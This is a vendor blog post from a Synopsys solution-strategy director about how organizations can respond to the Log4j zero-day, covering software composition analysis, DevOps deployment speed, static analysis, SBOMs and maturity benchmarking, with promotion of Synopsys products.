The discovery of Log4j has DevOps teams working tirelessly to mitigate the issue. Here are six actions your organization should be taking now.
At midnight last Thursday, we experienced one of the most notable infosec events in years. A new zero-day exploit in a popular logging package for Java, Log4j, was discovered. The exact origin and timeline are still being investigated, but it’s important to note that this was not just a vulnerability announcement. The information disclosed was rapidly followed by fully functional exploit code—and the exploit itself turned out to be trivial to execute.
Over 3 billion devices run Java, and because there are only a handful of logging libraries, many of them are likely to run Log4j. Worse still, many internet-exposed target applications can be exploited by external users without authentication. And unlike some other notable open source vulnerabilities, such as the infamous Heartbleed or the recently disclosed Trojan Source, in this case no prior coordination took place “behind the scenes” to ensure that users had adequate time to plan their response.Putting aside the deconstruction of the bug itself, here’s why the seasoned CISO should have slept late and enjoyed little more than their regular Friday routine.
As aviation safety enthusiasts say, an incident or accident occurs when the holes in the Swiss cheese line up. That is to say, we have multiple layers of protections and controls that should stop the worst-case scenarios from manifesting. Known catastrophic events occur only when all those controls fail to perform. Cybersecurity is no different, and we’ve been talking about defense in depth forever, too.
Here are six factors that, when combined, should help mitigate the impact and protect the Friday of every CISO.
A vulnerability response is a combination of people, process, and technology. Software composition analysis tools help identify and track library usage. When a new vulnerability emerges, a Synopsys Black Duck® research team investigates the issue. This particular vulnerability was not assigned a detailed CVE entry until several hours after it was disclosed, but Synopsys analysts had already allocated a Black Duck Security Advisory (BDSA) number and pushed the notification out to Synopsys customers.
The next question is your ability to respond. Once Black Duck sends out an alert, security analysts on your team can see which applications are impacted. The developers who own those applications get notifications automatically too, sometimes via Teams, Slack, or even in a Jira ticket or email, depending on how Black Duck alert is configured. You then need to have the organizational machinery in place to rapidly roll out an update. This is where we must look at the DevOps capability itself.
One of the key metrics from DevOps Research and Assessment (DORA), a cross-industry program to measure and benchmark organizational DevOps capabilities, is the speed at which a change can be pushed into production. According to DORA, elite performers can complete this cycle in less than an hour and deploy any change on demand. But only 26% of the 1,200 respondents surveyed in the latest State of DevOps Survey fall into the elite category. While this is a large number of organizations, the next tier, high performers, takes between a day to a week to complete the cycle. These organizations are equipped to respond less quickly, meaning that slotting in a security patch is not something that would be considered a “business as usual” activity.
This significant gap between elite and high performers illustrates why maximizing the uptake of foundational DevOps practices benefits everyone and underlines why security teams must partner with development to ensure that the business is adequately equipped to respond, whether tackling a fast fix for a security, quality, or any other kind of issue.
Figure 1: Software delivery performance metrics chart from State of DevOps Survey
Finally, beyond scrambling to fix the underlying component, there are three reasons why you shouldn’t be affected. Good code hygiene, good network architecture, and confidence that centralized security and engineering teams have integrated appropriate security checks into CI/CD pipelines and provided actionable information to developers should protect you, and help you avoid security, quality, and safety risks for every software delivery. Static code checkers, including Coverity®, can find log injection vulnerabilities, and in the case of modern infrastructure-as-code configurations, overly permissive network rules can be caught by automated analysis.
In a well-orchestrated AppSec program, determining whether your team or built-in automation ran the tools, and if they fixed the findings, should be a couple of clicks on the application security orchestration and correlation (ASOC) dashboard.
Furthermore, as we see increased adoption of SBOMs, championed recently by Executive Order 14028, software component information should flow more seamlessly between product vendors and their customers. Instead of calling every single supplier to confirm component information, the task now becomes a straightforward database search. Although users of software composition analysis products such as Black Duck already benefit from internal SBOM information for software that they develop in-house, we are on the cusp of broad SBOM adoption and distribution between organizations. Once established, this will be another powerful tool for mitigating and managing risk, and support more rapid response (perhaps even automated response) in these scenarios.
Of course, talking about all these things that should have already happened is a bit like the proverbial stable door and horse. It is important to highlight that security is not the job of any single person or department. For our mission to succeed, each one of these activities must be federated out into everybody’s job. And for organizations to achieve success, a range of different security activities must be woven into the culture of how IT systems are planned, constructed, and operated. Practices such as formulating nonfunctional security requirements and reviewing architecture at the design phase, for example, will help identify what data the application should process, and what requirements for security checks must be satisfied before software is released into production.
At modern organizations, the highly automated software delivery process or pipeline is programmed to fail if these prerequisite steps have not been completed, making it impossible to launch a product with such vulnerabilities or missing mitigations in the first place. In the future, SBOM information might become a means by which zero-trust architectures can dynamically determine the level of trust and privilege software may execute—or when it should be stopped from executing.
The good news is that it is possible now to measure and benchmark organizational ability across all these critical areas, and illuminate any gaps and areas for improvement using frameworks such as Building Software in Maturity Model (BSIMM).
With this reassurance, Synopsys customers will have wrapped up their Friday on schedule and be ready to enjoy the weekend.
Michael White is the director of solution strategy within Synopsys' Software Integrity Group. During his time at Synopsys, he has worked with leading software and IT organizations around the world to build programs to manage software security, safety, and reliability risks.